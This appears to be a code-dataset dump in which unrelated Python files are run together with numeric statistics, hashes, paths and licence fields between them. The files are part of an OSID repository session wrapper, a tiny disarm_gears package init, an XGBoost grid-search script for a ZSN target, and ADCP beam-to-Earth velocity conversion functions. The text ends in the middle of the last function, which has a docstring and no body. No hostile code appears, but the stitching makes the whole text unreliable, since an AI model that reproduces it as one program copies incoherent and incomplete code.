return self._provider_session.get_composition_query()
composition_query = property(fget=get_composition_query)
@utilities.arguments_not_none
def get_compositions_by_query(self, composition_query):
"""Gets a list of ``Compositions`` matching the given composition query.
arg: composition_query (osid.repository.CompositionQuery):
the composition query
return: (osid.repository.CompositionList) - the returned
``CompositionList``
raise: NullArgument - ``composition_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``composition_query`` is not of this
service
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_compositions_by_query(composition_query)
class CompositionAdminSession(abc_repository_sessions.CompositionAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Compositions``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Composition,`` a ``CompositionForm`` is requested using
``get_composition_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``CompositionForm`` will indicate that it is to be used with a
create operation and can be used to examine metdata or validate data
prior to creation. Once the ``CompositionForm`` is submiited to a
create operation, it cannot be reused with another create operation
unless the first operation was unsuccessful. Each
``CompositionForm`` corresponds to an attempted transaction.
For updates, ``CompositionForms`` are requested to the
``Composition`` ``Id`` that is to be updated using
``getCompositionFormForUpdate()``. Similarly, the
``CompositionForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``CompositionForm`` can only be used once for a successful update
and cannot be reused.
The delete operations delete ``Compositions``. To unmap a
``Composition`` from the current ``Repository,`` the
``CompositionRepositoryAssignmentSession`` should be used. These
delete operations attempt to remove the ``Bid`` itself thus removing
it from all known ``Repository`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_create_compositions(self):
"""Tests if this user can create ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a
``Composition`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
create operations to unauthorized users.
return: (boolean) - ``false`` if ``Composition`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_create_composition_with_record_types(self, composition_record_types):
"""Tests if this user can create a single ``Composition`` using the desired record types.
While ``RepositoryManager.getCompositionRecordTypes()`` can be
used to examine which records are supported, this method tests
which record(s) are required for creating a specific
``Composition``. Providing an empty array tests if a
``Composition`` can be created with no records.
arg: composition_record_types (osid.type.Type[]): array of
composition record types
return: (boolean) - ``true`` if ``Composition`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``composition_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_composition_form_for_create(self, composition_record_types):
"""Gets the composition form for creating new compositions.
A new form should be requested for each create transaction.
arg: composition_record_types (osid.type.Type[]): array of
composition record types
return: (osid.repository.CompositionForm) - the composition form
raise: NullArgument - ``composition_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_create_template
return self._provider_session.get_composition_form_for_create(composition_record_types)
@utilities.arguments_not_none
def create_composition(self, composiiton_form):
"""Creates a new ``Composition``.
arg: composiiton_form (osid.repository.CompositionForm): the
form for this ``Composition``
return: (osid.repository.Composition) - the new ``Composition``
raise: IllegalState - ``composition_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``composition_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``composition_form`` did not originate
from ``get_composition_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.create_resource_template
return self._provider_session.create_composition(composiiton_form)
def can_update_compositions(self):
"""Tests if this user can update ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a
``Composition`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
update operations to unauthorized users.
return: (boolean) - ``false`` if ``Composition`` modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_composition_form_for_update(self, composition_id):
"""Gets the composition form for updating an existing composition.
A new composition form should be requested for each update
transaction.
arg: composition_id (osid.id.Id): the ``Id`` of the
``Composition``
return: (osid.repository.CompositionForm) - the composition form
raise: NotFound - ``composition_id`` is not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
return self._provider_session.get_composition_form_for_update(composition_id)
def _get_composition_id_with_enclosure(self, enclosure_id):
"""Create an Composition with an enclosed foreign object.
return: (osid.id.Id) - the id of the new Composition
"""
return self._provider_session._get_composition_id_with_enclosure(enclosure_id)
@utilities.arguments_not_none
def update_composition(self, composition_form):
"""Updates an existing composition.
arg: composiiton_form (osid.repository.CompositionForm): the
form containing the elements to be updated
raise: IllegalState - ``composition_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``composition_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``composition_form`` did not originate
from ``get_composition_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
return self._provider_session.update_composition(composition_form)
def can_delete_compositions(self):
"""Tests if this user can delete ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a
``Composition`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
delete operations to unauthorized users.
return: (boolean) - ``false`` if ``Composition`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_composition(self, composition_id):
"""Deletes a ``Composition``.
arg: composition_id (osid.id.Id): the ``Id`` of the
``Composition`` to remove
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
self._provider_session.delete_composition(composition_id)
@utilities.arguments_not_none
def delete_composition_node(self, composition_id):
"""Deletes a ``Composition`` and all contained children.
arg: composition_id (osid.id.Id): the ``Id`` of the
``Composition`` to remove
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
@utilities.arguments_not_none
def add_composition_child(self, composition_id, child_composition_id):
"""Adds a composition to a parent composition.
arg: composition_id (osid.id.Id): the ``Id`` of a parent
``Composition``
arg: child_composition_id (osid.id.Id): the ``Id`` of a child
``Composition``
raise: AlreadyExists - ``child_composition_id`` is already a
child of ``composition_id``
raise: NotFound - ``composition_id`` or
``child_composition_id`` is not found
raise: NullArgument - ``composition_id`` or
``child_composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
@utilities.arguments_not_none
def remove_composition_child(self, composition_id, child_composition_id):
"""Removes a composition from a parent composition.
arg: composition_id (osid.id.Id): the ``Id`` of a parent
``Composition``
arg: child_composition_id (osid.id.Id): the ``Id`` of a child
``Composition``
raise: NotFound - ``composition_id`` or
``child_composition_id`` is not found or not related
raise: NullArgument - ``composition_id`` or
``child_composition_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
def can_manage_composition_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Composition`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
@utilities.arguments_not_none
def alias_composition(self, composition_id, alias_id):
"""Adds an ``Id`` to a ``Composition`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Composition`` is determined by the
provider. The new ``Id`` is an alias to the primary ``Id``. If
the alias is a pointer to another composition, it is reassigned
to the given composition ``Id``.
arg: composition_id (osid.id.Id): the ``Id`` of a
``Composition``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is in use as a primary
``Id``
raise: NotFound - ``composition_id`` not found
raise: NullArgument - ``composition_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise Unimplemented()
| 43.778574
| 191
| 0.674325
| 14,751
| 128,315
| 5.717172
| 0.03776
| 0.022909
| 0.038454
| 0.048486
| 0.889036
| 0.861242
| 0.832049
| 0.794353
| 0.773413
| 0.751749
| 0
| 0.000125
| 0.249784
| 128,315
| 2,930
| 192
| 43.793515
| 0.875945
| 0.683303
| 0
| 0.45339
| 0
| 0
| 0.010338
| 0.00468
| 0
| 0
| 0
| 0
| 0
| 1
| 0.311441
| false
| 0.016949
| 0.016949
| 0.004237
| 0.608051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
52f947a52c5a8af23c6da096efcf1e559760f853
| 97
|
py
|
Python
|
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | null | null | null |
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | 11
|
2019-02-28T00:18:47.000Z
|
2020-02-22T20:36:00.000Z
|
disarm_gears/__init__.py
|
disarm-platform/disarm-gears
|
d9f747687e632102a4ef2821b33936daacb01b6c
|
[
"MIT"
] | null | null | null |
from disarm_gears import frames
from disarm_gears import util
from disarm_gears import r_plugins
| 24.25
| 34
| 0.876289
| 16
| 97
| 5.0625
| 0.5
| 0.37037
| 0.555556
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 35
| 32.333333
| 0.952941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eabccb0f31742b5a46fcdce44c458c4d6cc4ee4e
| 3,160
|
py
|
Python
|
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
inf_classif_analysis/tree_based_class_dummy/ZSN_variable/xgboost_ZSN.py
|
Marco-Ametrano/myocardal_infarction_class
|
d2fb9d4d6643d0b836ffdb94a32911eb4d68c390
|
[
"MIT"
] | null | null | null |
#XGBoost ZSN no scale_pos_weight
XGBclassifier= xgboost.XGBClassifier(random_state=22)
XGBclassifier.fit(X_train, Y_ZSN_train.values.ravel())
importances=XGBclassifier.feature_importances_; importances
np.where(importances>0.02)
X_train_rid = X_train.iloc[:, [ 0, 9, 24, 27, 33, 41, 43, 44, 46, 53, 78, 85, 87,
91, 92, 93, 97, 98, 101]]
X_test_rid = X_test.iloc[:, [ 0, 9, 24, 27, 33, 41, 43, 44, 46, 53, 78, 85, 87,
91, 92, 93, 97, 98, 101]]
XGBparams = dict(eta=[0.05, 0.10, 0.15, 0.20], gamma=[ 0.0, 0.1, 0.2 , 0.3],
max_depth=[ 3, 4, 5, 6, 8, 10], min_child_weight=[ 1, 3, 5],
colsample_bytree=[ 0.3, 0.4, 0.5])
grid_search_XGB = GridSearchCV(XGBclassifier, XGBparams,verbose=1, cv=3, n_jobs=-1)
grid_search_XGB.fit(X_train_rid,Y_ZSN_train.values.ravel())
print(grid_search_XGB.best_params_)
XGBclassifier=xgboost.XGBClassifier(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bytree=0.4, gamma=0.2, eta=0.05,
max_delta_step=0, max_depth=5, min_child_weight=1, missing=None,
n_estimators=100, n_jobs=1, nthread=None,
objective='multi:softmax',num_class=12, random_state=22, reg_alpha=0,
reg_lambda=1, scale_pos_weight=1, seed=None, silent=True,
subsample=1)
XGBclassifier.fit(X_train_rid,Y_ZSN_train.values.ravel())
y_train_pred=XGBclassifier.predict(X_train_rid)
print(classification_report(Y_ZSN_train, y_train_pred))
y_test_pred = XGBclassifier.predict(X_test_rid)
print(classification_report(Y_ZSN_test, y_test_pred))
#XGBoost ZSN scale_pos_weight
ZSN.value_counts()
XGBclassifier= xgboost.XGBClassifier(random_state=22, scale_pos_weight=2.99)
XGBclassifier.fit(X_train, Y_ZSN_train.values.ravel())
importances=XGBclassifier.feature_importances_; importances
np.where(importances>0.02)
X_train_rid = X_train.iloc[:, [ 0, 1, 9, 24, 27, 40, 41, 44, 46, 49, 53, 85, 86, 89, 91, 92, 93,
98, 99]]
X_test_rid = X_test.iloc[:, [ 0, 1, 9, 24, 27, 40, 41, 44, 46, 49, 53, 85, 86, 89, 91, 92, 93,
98, 99]]
XGBparams = dict(eta=[0.05, 0.10, 0.15, 0.20], gamma=[ 0.0, 0.1, 0.2 , 0.3],
max_depth=[ 3, 4, 5, 6, 8, 10], min_child_weight=[ 1, 3, 5],
colsample_bytree=[ 0.3, 0.4, 0.5])
grid_search_XGB = GridSearchCV(XGBclassifier, XGBparams,verbose=1, cv=3, n_jobs=-1)
grid_search_XGB.fit(X_train_rid,Y_ZSN_train.values.ravel())
print(grid_search_XGB.best_params_)
XGBclassifier=xgboost.XGBClassifier(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bytree=0.4, gamma=0.0, eta=0.05,
max_delta_step=0, max_depth=8, min_child_weight=1, missing=None,
n_estimators=100, n_jobs=1, nthread=None,
objective='multi:softmax',num_class=12, random_state=22, reg_alpha=0,
reg_lambda=1, scale_pos_weight= 2.99, seed=None, silent=True,
subsample=1)
XGBclassifier.fit(X_train_rid,Y_ZSN_train.values.ravel())
y_train_pred=XGBclassifier.predict(X_train_rid)
print(classification_report(Y_ZSN_train, y_train_pred))
y_test_pred = XGBclassifier.predict(X_test_rid)
print(classification_report(Y_ZSN_test, y_test_pred))
| 48.615385
| 99
| 0.701899
| 540
| 3,160
| 3.846296
| 0.205556
| 0.034665
| 0.034665
| 0.043332
| 0.966779
| 0.95715
| 0.912855
| 0.900337
| 0.900337
| 0.874338
| 0
| 0.10721
| 0.152848
| 3,160
| 64
| 100
| 49.375
| 0.668659
| 0.018671
| 0
| 0.754717
| 0
| 0
| 0.012262
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.075472
| 0
| 0.075472
| 0.113208
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eabeecb2672aca0bfed8a97e3c444cb395ff0722
| 24,621
|
py
|
Python
|
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | 4
|
2019-09-25T21:39:50.000Z
|
2022-02-16T19:11:21.000Z
|
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | null | null | null |
dewaveADCP/beam2earth.py
|
apaloczy/dewaveADCP
|
f37702905ccaeb5a4ecc738cba9ee46cd76cd03f
|
[
"MIT"
] | 1
|
2021-12-10T12:32:26.000Z
|
2021-12-10T12:32:26.000Z
|
# Functions for converting ADCP velocities in beam coordinates to instrument- or Earth-coordinates.
# Direct translation of functions in the 'ADCPtools' MATLAB
# package (https://github.com/apaloczy/ADCPtools).
import numpy as np
from scipy.interpolate import interp1d
from .utils import sind, cosd, near, nearfl
######################
#### 4-beam Janus ####
######################
def janus2xyz(b1, b2, b3, b4, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True):
"""
USAGE
-----
vx, vy, vz = janus2xyz(b1, b2, b3, b4, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True)
theta, ptch, roll must be in RADIANS.
"""
Nz, Nt = b1.shape
if binmaptype is not None:
assert r is not None, "Must provide r if using bin-mapping."
assert ptch is not None, "Must provide pitch if using bin-mapping."
assert roll is not None, "Must provide roll if using bin-mapping."
if verbose:
print('Mapping bins to horizontal planes using *%s* interpolation.'%binmaptype)
b1, b2, b3, b4 = binmap(b1, b2, b3, b4, r, theta, ptch, roll, how=binmaptype)
else:
if verbose:
print('Bin-mapping NOT applied.')
if use3beamsol:
b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)
b1, b2 = b1[..., np.newaxis], b2[..., np.newaxis]
b3, b4 = b3[..., np.newaxis], b4[..., np.newaxis]
B = np.dstack((b1, b2, b3, b4))
uvfac = 1/(2*np.sin(theta))
wfac = 1/(4*np.cos(theta)) # For w derived from beams 1-4.
# 3rd row: w from the average of the 4 Janus beams.
# b1 b2 b3 b4
A = np.array([[-1, 1, 0, 0],
[ 0, 0, -1, 1],
[-1, -1, -1, -1]])
vxyz = np.empty((Nz, Nt, 3))*np.nan
for nz in range(Nz):
if verbose:
print('Calculating Vx, Vy, Vz at bin ', nz+1, '/', Nz)
for nt in range(Nt):
vxyz[nz, nt, :] = np.matmul(A, B[nz, nt, :].T)
Vx = vxyz[:, :, 0]*uvfac
Vy = vxyz[:, :, 1]*uvfac
Vz = vxyz[:, :, 2]*wfac
return Vx, Vy, Vz
def janus2earth(head, ptch, roll, theta, b1, b2, b3, b4, r=None, gimbaled=True, binmaptype=None, use3beamsol=True, verbose=True):
"""
USAGE
-----
[u, v, w] = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4, r=None, gimbaled=True, binmaptype=None, use3beamsol=True, verbose=True)
Calculates Earth velocities (u,v,w) = (east,north,up) from beam-referenced velocity time series
from a 4-beam Janus ADCP, (e.g., Appendix A of Dewey & Stringer (2007), Equations A3-A11).
nz, nt, nb = number of vertical bins, data records, beams.
============================================================================
For TRDI instruments, call function like this:
u, v, w = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4)
For Nortek instruments, call function like this:
u, v, w = janus2earth(head-90, roll, -ptch, theta, -b1, -b3, -b4, -b2)
============================================================================
TRDI CONVENTION:
================
* Velocity toward transducers' faces: POSITIVE
* Clockwise PITCH (tilt about x-AXIS): POSITIVE (beam 3 higher than beam 4)
* Clockwise ROLL (tilt about y-AXIS): POSITIVE (beam 2 higher than beam 1)
* Heading increases CLOCKWISE from the *Y-AXIS*.
^ positive y axis, psi = 0
|
3
|
|
|
2 --- O --- 1 ---> positive x axis, psi = +90
|
|
|
4
NORTEK CONVENTION:
==================
* Velocity toward transducers' faces: NEGATIVE
* Counter-clockwise PITCH (tilt about y-AXIS, equivalent to -ROLL in the TRDI convention): POSITIVE (beam 1 higher than beam 3)
* Clockwise ROLL (tilt about x-AXIS, equivalent to PITCH in the TRDI convention): POSITIVE (beam 4 higher than beam 2)
Heading increases CLOCKWISE from the *X-AXIS*.
^ positive y axis, psi = -90
|
4
|
|
|
3 --- O --- 1 ---> positive x axis, psi = 0
|
|
|
2
INPUTS
------
b1, b2, b3, b4 [nz -by- nt] matrices of along-beam velocity components.
head, ptch, roll [nt] vectors with (time-dependent) heading, pitch
and roll angles, following D&S2007's notation.
theta Beam angle measured from the vertical.
*For RDI Sentinel V and Nortek Signature: 25.
gimbaled [True or False] Whether the ADCP was deployed with a gimbaled roll sensor
(default true). Applies the correction to the raw pitch angle
if the pitch/roll sensors were mounted rigidly to the
instrument ('Gimbaled'==false), or the correction to the raw
heading angle if the ADCP was mounted on a gimbal (Dewey &
Stringer, 2007; Lohrmann et al., 1990).
binmaptype [None or 'linear' or 'nn']
Whether to map the beam velocities to fixed horizontal
planes with linear interpolation ('linear') or nearest-neighbor
interpolation ('nearest') prior to converting
to instrument coordinates (Ott, 2002; Dewey & Stringer, 2007).
*The default is to NOT perform any bin mapping.
use3beamsol [True or False] Whether to use three-beam solutions when exactly one beam has
no data in one cell.
OUTPUTS
-------
[u, v, w] [east, north, up] components of Earth-referenced velocity vector.
"""
nz, nt = b1.shape # Number of vertical bins and records in the time series.
d2r = np.pi/180
head = head*d2r
ptch = ptch*d2r
roll = roll*d2r
theta = theta*d2r
# Time-dependent angles (heading, pitch and roll).
Sph1 = np.sin(head)
Sph2 = np.sin(ptch)
Sph3 = np.sin(roll)
Cph1 = np.cos(head)
Cph2 = np.cos(ptch)
Cph3 = np.cos(roll)
if gimbaled: # Correct heading (D&S 2007, eq. A2).
if verbose:
print('Gimbaled instrument case.')
Sph2Sph3 = Sph2*Sph3
head = head + np.arcsin( Sph2Sph3/np.sqrt(Cph2**2 + Sph2Sph3**2) )
Sph1 = np.sin(head)
Cph1 = np.cos(head)
else: # Correct pitch (D&S 2007, eq. A1 Lohrmann et al. 1990, eq. A1).
if verbose:
print('Fixed instrument case.')
ptch = np.arcsin( (Sph2*Cph3)/np.sqrt(1 - (Sph2*Sph3)**2) )
Sph2 = np.sin(ptch)
Cph2 = np.cos(ptch)
# Convert instrument-referenced velocities
# to Earth-referenced velocities.
cx1 = Cph1*Cph3 + Sph1*Sph2*Sph3
cx2 = Sph1*Cph3 - Cph1*Sph2*Sph3
cx3 = Cph2*Sph3
cy1 = Sph1*Cph2
cy2 = Cph1*Cph2
cy3 = Sph2
cz1 = Cph1*Sph3 - Sph1*Sph2*Cph3
cz2 = Sph1*Sph3 + Cph1*Sph2*Cph3
cz3 = Cph2*Cph3
# Convert beam-referenced velocities to instrument-referenced velocities.
# NOTE: The convention used here (positive x axis = horizontally away from beam 1) and
# positive y axis = horizontally away from beam 3) is not
# the same as the one used by the instrument's firmware if
# the coordinate transformation mode is set to "instrument
# coordinates" before deployment.
Vx, Vy, Vz = janus2xyz(b1, b2, b3, b4, theta, r=r, ptch=ptch, roll=roll, binmaptype=binmaptype, use3beamsol=use3beamsol, verbose=verbose)
u = +Vx*cx1 + Vy*cy1 + Vz*cz1
v = -Vx*cx2 + Vy*cy2 - Vz*cz2
w = -Vx*cx3 + Vy*cy3 + Vz*cz3
return u, v, w
######################
#### 5-beam Janus ####
######################
def janus2xyz5(b1, b2, b3, b4, b5, theta, r=None, ptch=None, roll=None, binmaptype=None, use3beamsol=True, verbose=True):
"""
USAGE
-----
vx, vy, vz = janus2xyz5(b1, b2, b3, b4, b5, theta, r=None, ptch=ptch, roll=roll, binmaptype=None, use3beamsol=True, verbose=True)
theta, ptch, roll must be in RADIANS.
"""
Nz, Nt = b1.shape
if binmaptype is not None:
assert r is not None, "Must provide r if using bin-mapping."
assert ptch is not None, "Must provide pitch if using bin-mapping."
assert roll is not None, "Must provide roll if using bin-mapping."
if verbose:
print('Mapping bins to horizontal planes using *%s* interpolation.'%binmaptype)
b1, b2, b3, b4, b5 = binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how=binmaptype)
else:
if verbose:
print('Bin-mapping NOT applied.')
if use3beamsol:
b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)
b1, b2 = b1[..., np.newaxis], b2[..., np.newaxis]
b3, b4 = b3[..., np.newaxis], b4[..., np.newaxis]
b5 = b5[..., np.newaxis]
B = np.dstack((b1, b2, b3, b4, b5))
uvfac = 1/(2*np.sin(theta))
wfac = 1/(4*np.cos(theta)) # For w derived from beams 1-4.
# 3rd row: w from the average of the 4 Janus beams.
# b1 b2 b3 b4 b5
A = np.array([[-1, 1, 0, 0, 0],
[ 0, 0, -1, 1, 0],
[-1, -1, -1, -1, 0],
[ 0, 0, 0, 0, -1]])
vxyz = np.empty((Nz, Nt, 4))*np.nan
for nz in range(Nz):
if verbose:
print('Calculating Vx, Vy, Vz, Vz5 at bin ', nz+1, '/', Nz)
for nt in range(Nt):
vxyz[nz, nt, :] = np.matmul(A, B[nz, nt, :].T)
Vx = vxyz[:, :, 0]*uvfac
Vy = vxyz[:, :, 1]*uvfac
Vz = vxyz[:, :, 2]*wfac
Vz5 = vxyz[:, :, 3]
return Vx, Vy, Vz, Vz5
def janus2earth5(head, ptch, roll, theta, b1, b2, b3, b4, b5, r=None, gimbaled=True, binmaptype=None, uvwbeam5=True, use3beamsol=True, verbose=True):
"""
USAGE
-----
u, v, w, w5 = janus2earth5(head, ptch, roll, theta, b1, b2, b3, b4, b5, r=None, gimbaled=True, binmaptype=None, uvwbeam5=True, use3beamsol=True, verbose=True)
Calculates Earth velocities (u,v,w) = (east,north,up) from beam-referenced velocity time series
from a 5-beam Janus ADCP, (e.g., Appendix A of Dewey & Stringer (2007), Equations A3-A11).
nz, nt, nb = number of vertical bins, data records, beams.
============================================================================
For TRDI instruments, call function like this:
u, v, w = janus2earth(head, ptch, roll, theta, b1, b2, b3, b4)
For Nortek instruments, call function like this:
u, v, w = janus2earth(head-90, roll, -ptch, theta, -b1, -b3, -b4, -b2)
============================================================================
TRDI CONVENTION:
================
* Velocity toward transducers' faces: POSITIVE
* Clockwise PITCH (tilt about x-AXIS): POSITIVE (beam 3 higher than beam 4)
* Clockwise ROLL (tilt about y-AXIS): POSITIVE (beam 2 higher than beam 1)
* Heading increases CLOCKWISE from the *Y-AXIS*.
^ positive y axis, psi = 0
|
3
|
|
|
2 --- O --- 1 ---> positive x axis, psi = +90
|
|
|
4
NORTEK CONVENTION:
==================
* Velocity toward transducers' faces: NEGATIVE
* Counter-clockwise PITCH (tilt about y-AXIS, equivalent to -ROLL in the TRDI convention): POSITIVE (beam 1 higher than beam 3)
* Clockwise ROLL (tilt about x-AXIS, equivalent to PITCH in the TRDI convention): POSITIVE (beam 4 higher than beam 2)
Heading increases CLOCKWISE from the *X-AXIS*.
^ positive y axis, psi = -90
|
4
|
|
|
3 --- O --- 1 ---> positive x axis, psi = 0
|
|
|
2
INPUTS
------
b1, b2, b3, b4, b5 [nz -by- nt] matrices of along-beam velocity components.
head, ptch, roll [nt] vectors with (time-dependent) heading, pitch
and roll angles, following D&S2007's notation.
theta Beam angle measured from the vertical.
*For RDI Sentinel V and Nortek Signature: 25.
uvwBeam5 [True or False] whether to calculate [u, v, w] using the independent information
from beam 5 (defaults true). If false, the usual four-beam
solution using w derived from beams 1-4 is calculated.
gimbaled [True or False] Whether the ADCP was deployed with a gimbaled roll sensor
(default true). Applies the correction to the raw pitch angle
if the pitch/roll sensors were mounted rigidly to the
instrument ('Gimbaled'==false), or the correction to the raw
heading angle if the ADCP was mounted on a gimbal (Dewey &
Stringer, 2007; Lohrmann et al., 1990).
binmaptype [None or 'linear' or 'nn']
Whether to map the beam velocities to fixed horizontal
planes with linear interpolation ('linear') or nearest-neighbor
interpolation ('nearest') prior to converting
to instrument coordinates (Ott, 2002; Dewey & Stringer, 2007).
*The default is to NOT perform any bin mapping.
use3beamsol [True or False] Whether to use three-beam solutions when exactly one beam has
no data in one cell.
OUTPUTS
-------
[u, v, w, w5] [east, north, up, up-(from vertical beam only)] components
of Earth-referenced velocity vector.
"""
